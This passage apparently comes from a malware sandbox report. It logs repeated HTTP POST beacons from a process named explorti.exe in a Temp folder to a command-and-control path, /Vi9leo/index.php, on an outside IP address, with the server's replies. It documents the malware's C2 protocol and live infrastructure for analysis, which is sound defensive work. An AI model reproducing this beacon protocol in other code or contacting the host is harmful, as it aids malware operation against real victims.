                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:34.685813904 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:34.686503887 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:34.942203999 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      27          192.168.2.4  49764        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:35.063901901 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:35.814773083 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:35.815455914 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:36.064908981 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      28          192.168.2.4  49765        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:36.184197903 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:36.982029915 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:36.983530045 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:37.231925011 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      29          192.168.2.4  49766        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:37.346117020 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:38.133208036 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:38.134059906 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:38.388470888 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      30          192.168.2.4  49767        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:38.502717972 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:39.251872063 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:39.252782106 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:39.508150101 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      31          192.168.2.4  49768        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:39.726646900 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:40.503628016 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:40.505124092 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:40.758210897 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      32          192.168.2.4  49769        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:40.875351906 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:41.681533098 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:41.682354927 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:41.941015959 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      33          192.168.2.4  49770        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:42.118132114 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:42.900330067 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:42.901269913 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:43.153440952 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      34          192.168.2.4  49771        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:43.265912056 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:44.040589094 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:44.041460991 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:44.293975115 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      35          192.168.2.4  49772        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:44.408723116 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:45.182593107 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:45.183196068 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:45.435314894 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      36          192.168.2.4  49773        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:45.553071022 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:46.296711922 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:46.299961090 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:46.545428991 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      37          192.168.2.4  49774        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:46.678755045 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:47.433199883 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:47.434026003 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:47.682704926 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      38          192.168.2.4  49775        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:47.801697016 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:48.583400011 CEST  219                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:48.584208965 CEST  306                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:48.903158903 CEST  196                IN         HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      39          192.168.2.4  49776        185.215.113.19  80                6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp                             Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:49.022285938 CEST  154                OUT        POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:49.840581894 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:49.842149973 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:50.104958057 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      40 | 192.168.2.4 | 49777 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:50.238898039 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:51.019289017 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:51.020160913 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:51.281037092 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      41 | 192.168.2.4 | 49778 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
